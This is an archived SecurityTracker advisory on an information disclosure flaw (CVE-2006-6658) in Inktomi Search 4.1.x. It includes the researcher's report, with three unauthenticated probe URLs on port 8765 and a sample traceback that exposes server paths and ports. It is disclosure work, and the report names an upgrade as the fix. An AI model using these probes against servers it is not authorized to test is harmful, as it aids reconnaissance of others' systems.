SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   HPE Autonomy Ultraseek (Inktomi Enterprise Search) Vendors:   Autonomy
Inktomi Search Discloses System Information to Remote Users
SecurityTracker Alert ID:  1017242
SecurityTracker URL:  http://securitytracker.com/id/1017242
CVE Reference:   CVE-2006-6658   (Links to External Site)
Updated:  Jun 2 2008
Original Entry Date:  Nov 16 2006
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 4.1.x; tested on 4.1.4
Description:   A vulnerability was reported in Inktomi Search. A remote user can obtain information from the target system.

A remote user can load the following type of URLs to obtain information from the target system:

http://[target]:8765/help/header.html
http://[target]:8765/topics.html
http://[target]:8765/thesaurus.html

The vendor was notified on November 16, 2006.

Juha-Matti Laurio reported that this vulnerability affects Inktomi Search.

[Editor's note: This vulnerability was originally reported by TippingPoint as affecting Verity Ultraseek, the successor product to Inktomi Search. See Alert ID 1017235 or CVE-2006-5819.]

Impact:   A remote user can obtain information from the target system.
Solution:   No solution was available at the time of this entry.

A fix for the successor product (Ultraseek) is available. The Ultraseek advisory is available at:

http://www.ultraseek.com/support/docs/RELNOTES.txt

Vendor URL:  www.autonomy.com/ (Links to External Site)
Cause:   Access control error

Message History:   None.


 Source Message Contents

Subject:  Inktomi Search 4.x Scripts Information Disclosure Vulnerability


Inktomi Search versions 4.1.x are confirmed as affected to Verity Ultraseek script 
information disclosure vulnerability reported recently at 
http://www.zerodayinitiative.com/advisories/ZDI-06-042.html

I have tested that using the following URL discloses the full path to header.html file:
http://www.[domainnameremoved].fi:8765/help/header.html

There are same results when testing with the following URL's outside of Help directory:
http://www.[domainnameremoved].fi:8765/topics.html
and
http://www.[domainnameremoved].fi:8765/thesaurus.html

Tested version is 4.1.4, released in 2000. Other versions may also be affected.

Using these URLs disclosing internal server information and port numbers is possible.
Authentication is not required to exploit this vulnerability.

Vendor has been contacted on 16th November, 2006.

Vendor information:
Verity (part of Autonomy)

Solution:
Upgrade to supported Ultraseek version 5.7.

Test output of http://www.[domainnameremoved].fi:8765/help/header.html :

===
Internal Server Error
Server cannot complete operation

    exceptions.NameError: There is no variable named 'section'
      File header.html, line 4, in ?
        data = <code object ? at 01F33350, file "header.html", line 4>
        frag = ''
        htmlquote = <built-in function htmlquote>
        netloc = 'www.[domainnameremoved].fi:8765'
        parms = ''
        path = '/help/header.html'
        pathname = 'e:\\InktomiSearch4.1\\docs-[removed]\\help\\header.html'
        qs = ''
        query = {}
        realm = None
        scheme = 'http'
        self = <httpsrvr.RequestHandler ('xx.xxx.xxx.x', 2469)>
        server = <httpsrvr.Server ('', 8765)>
        thr = 3616
        urlquote = <method RequestHandler.urlquote of RequestHandler instance at 0
        wlines = [u'<html>\012', u'<head>\012', u'<title>', u'Internal Server Erro
        write = <method RequestHandler.write of RequestHandler instance at 0239C8C
        writeent = <method RequestHandler.writeent of RequestHandler instance at 0
      File httpsrvr.py, line 872, in handle
        data = <code object ? at 01F33350, file "header.html", line 4>
        frag = ''
        htmlquote = <built-in function htmlquote>
        netloc = 'www.[domainnameremoved].fi:8765'
        parms = ''
        path = '/help/header.html'
        pathname = 'e:\\InktomiSearch4.1\\docs-[removed]\\help\\header.html'
        qs = ''
        query = {}
        realm = None
        scheme = 'http'
        self = <httpsrvr.RequestHandler ('xx.xxx.xxx.x', 2469)>
        server = <httpsrvr.Server ('', 8765)>
        thr = 3616
        urlquote = <method RequestHandler.urlquote of RequestHandler instance at 0
        wlines = [u'<html>\012', u'<head>\012', u'<title>', u'Internal Server Erro
        write = <method RequestHandler.write of RequestHandler instance at 0239C8C
        writeent = <method RequestHandler.writeent of RequestHandler instance at 0
      File httpsrvr.py, line 925, in __init__
        client_address = ('xx.xxx.xxx.x', 2469)
        sckt = <socket._socketobject instance at 0244287C>
        self = <httpsrvr.RequestHandler ('xx.xxx.xxx.x', 2469)>
        server = <httpsrvr.Server ('', 8765)>
===

E.g. the following port numbers were listed: 2469, 2493, 2494

Domain name of remote test server and client IP address hidden due to security and privacy reasons.


Regards,
Juha-Matti Laurio
Finland
http://www.networksecurity.fi/
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC